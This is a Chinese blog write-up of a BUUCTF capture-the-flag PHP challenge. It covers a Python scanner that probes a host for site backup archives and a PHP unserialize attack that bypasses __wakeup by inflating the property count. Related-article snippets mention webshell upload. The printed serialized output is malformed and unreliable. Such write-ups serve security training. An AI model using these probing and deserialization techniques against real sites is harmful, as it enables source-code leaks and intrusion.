【BUUCTF-Web】 [极客大挑战 2019]PHP

最新推荐文章于 2024-07-30 10:14:57 发布
最新推荐文章于 2024-07-30 10:14:57 发布
阅读量744 收藏 5
点赞数 1
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51683653/article/details/126693573
版权

网页

 提示了备份网站,这里用python的一个脚本发现网页存在www.zip

py代码

import requests

url1 = 'http://b46b86f5-0026-4a73-ac83-f9a48c4c7470.node4.buuoj.cn:81/'  # url为被扫描地址,后不加‘/’

# 常见的网站源码备份文件名  同目录下创建List.txt 如web,website,backup,back,www,wwwroot,temp等
# with open('List1.txt', 'r') as f:
#     list1 = f.read().splitlines()
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']

# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar', '7-zip', '7z']
for i in list1:
    for j in list2:
        back = str(i) + '.' + str(j)
        url = str(url1) + '/' + back
        print(back + '    ', end='')
        print(requests.get(url).status_code)

在网址后加/www.zip 下载文件包

 查看flag.php

 

直接提交发现错误

再打开index.php

 

unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。

 这里很可能考察反序列化,查看文件中包含的class.php文件。

直接看重点,我们想要输出flag,在这儿。它有个判断条件,是username绝对等于admin:

再往上看,发现password要弱等于100,不然的话就会在上面的判断里被die。

再往上看到,wakeup函数里会把我们的username赋值为guest。因为wakeup函数是在__destruct函数之前运行的,所以我们要绕过它。

经过分析,已经确定需要提交的参数是 select,而且提交的值是经过序列化之后的值,username=‘admin’,password=‘100’ 才能过。

# 序列化代码
<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}

$ser = serialize(new Name());##序列化
var_dump($ser);##输出
?>
    
## 结果:"O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:3:'100';}"

var_dump() 函数用于输出变量的相关信息。

var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。

 要绕过__wakeup只要让说明的参数个数大于实际的参数个数就行了。

 得到flag

RexHarrr
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 9056
SQL注入。
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 611
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
【CTF WebBUUCTF BUU LFI COURSE 1 Writeup(代码审计+PHP+文件包含漏洞)
HEX9CF的技术博客
06-01 590
1点击启动靶机。
BUUCTF-[极客挑战 2019]PHP
rumil的博客
06-29 216
通过第二个if控制语句,我们发现通过正则表达式过滤掉了flag,所有说file参数传入时,如果有flag出现就会被过滤掉,我们再根据下一句话,文件包含,我们尝试去获取useless.php 的源码,看是什么信息,再次构造payload。发现是网页的源码,经过分析可得,三个参数分别为text,file,password通过get方式进行传参,在if控制语句当中,设置text变量,并在文件当中读取数据,要等于welcome to the zjctf才会返回true。:私有的类成员则只能被其定义所在的类访问。
web安全入门-buuctf-[极客挑战 2019]PHP 1
2301_80137226的博客
04-21 354
class定义了一个Name,当password=100和username=admin时会输出flag。有点提示,‘有一个良好的备份网站的习惯’,我们尝试一下看一下网站目录,或尝试输入网站源码备份文件。发现index.php包含了class.php还有一个select为变量,我们看一下class。调用unserialize()时会自动调用魔法函数wakeup(),可以通过改变属性数绕过,把。一,使用用dirsearch或dirmap来扫描网站。后面的2改为3或以上即可。得到了这样的一个URL。
Buuctf-Web-[极客挑战 2019]Havefun
御七彩虹猫
05-13 340
Buuctf-Web-[极客挑战 2019]Havefun
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1349
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
BUUCTF-Web-网络协议-[极客挑战 2019]Http
weixin_42566218的博客
03-30 7995
BUUCTF-Web-网络协议-[极客挑战 2019]Http 题目链接:BUUCTF 类型:请求头绕过 知识点:http请求头(Referer、X-Forwarded-For、User-Agent) 解题过程 单从网页看是发现不了什么隐藏内容的,通过F12打开控制台直接搜索关键字"php"发现一个超链接文件"Secret.php",因为"onclick=return flase"所以从网页中直接点击是无法跳转的 手动访问"Secret.php“页面后提示”It doesn't come fr
BUUCTF-WEB-极客挑战 2019 HTTP
JC_xxx的博客
10-06 472
进入题目 右击查看源代码找到了一个名为Secret.phpphp文件 访问Secret.php,看到提示,很明显是要求来自"https://www.Sycsecret.com" 在http请求头中直接修改或添加referer字段 修改后,页面的提示发生变化,要求我们使用Syclover 修改User-Agent 修改后,提示要求我们只能要求我们本地访问,这就需要修改X-Forwarded-For(XFF)了 修改X-Forwarded-For 修改后,即可得到flag ...
buuctf-web-[极客挑战 2019]Secret File1
mlws1900的博客
08-05 508
get传参,可以利用文件包含,对tp,input进行了过滤,可以用filter对文件进行读取,而且已经告知我们flag在flag.php里面,出如下payload。刚开始看到这个界面还以为是目录扫描,结果把网页扫死了。发现一个 secr3t.php,打开获得了代码。对以上编码进行base64解码获得flag。点击secret,看来要利用bp抓包。...
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
基于Java的geekanime-backend极客动漫设计源码
05-24
本项目是基于Java的geekanime-backend极客动漫设计源码,包含256个文件,其中包括225个Java文件、23个XML文件、3个YAML文件、1个Gitignore文件、1个Dockerfile文件、1个Markdown文件、1个JSON文件和1个XLSX文件。...
微信小程序-- 极客学院
04-02
在这个“微信小程序-- 极客学院”资源中,我们可以期待学习到关于如何利用微信小程序平台进行开发的专业知识。 1. 微信小程序基础: 微信小程序的基础包括了它的架构、生命周期和API。学习者需要理解小程序的XML和...
勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖.zip
04-23
【标题解析】:“勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖.zip”这个标题暗示了一个与数学和几何学相关的项目或活动,可能是一个教育游戏或者教学资源。"勇士的奇妙大冒险"可能是游戏的主题,...
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 482
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 1021
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
PHP一维数组怎么转关联数组
最新发布
qq_32450471的博客
07-30 290
php是一门广泛应用于web开发的脚本语言。其强大的数组功能是其最重要的特征之一。在PHP中,数组是一个能够存储多个值的变量,并且这些值可以是任何类型的数据,比如整数、浮点数、字符串、布尔值、对象等等。此外,数组还可以分为索引数组和关联数组。本文主要介绍PHP中一维数组转关联数组的方法。
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RexHarrr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值